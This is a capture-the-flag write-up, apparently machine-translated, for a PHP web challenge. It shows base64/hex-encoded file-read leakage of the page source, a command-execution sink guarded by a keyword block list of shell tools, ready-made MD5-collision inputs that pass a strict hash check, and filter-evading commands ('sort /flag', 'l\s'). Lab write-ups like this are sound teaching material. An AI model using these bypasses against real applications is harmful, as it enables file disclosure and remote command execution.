Inspect knowledge points:

1. The sensitivity of decryption (or the strength of the tool)

2.md5 accumulation of strong comparisons

3. Function accumulation of reading files

Solution:

Enter the page to directly burp the packet:

There is an img=TXpVek5UTTFNbVUzTURabE5qYz0, let's put it directly into the script and run it:

The script is easy to write, just write one according to the way you like.It is decoded and found to be 555.png. Because of the characteristics of the url here, it should only be encoded three times here:

hex->base64->base64

Then let's try to read the page source code:

Then paste it into img

Decode it

';die("xixiï½ no flag");} else {$txt = base64_encode(file_get_contents($file));echo "";echo "
";}echo $cmd;echo "
";if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "
";} else {if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])){echo `$cmd`;} else {echo ("md5 is funny ~");}}?>

There is a lot of filtering about cmd, and there is another entry condition

(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])

Simple, fry the bottom of the house:

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

 

 

b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

Posture one:

sort /flag

The lack of this posture is that I don't know the name of the flag, so I have to guess

Pose Two:

l\s

This method is very useful to bypass, and you can also know the flag name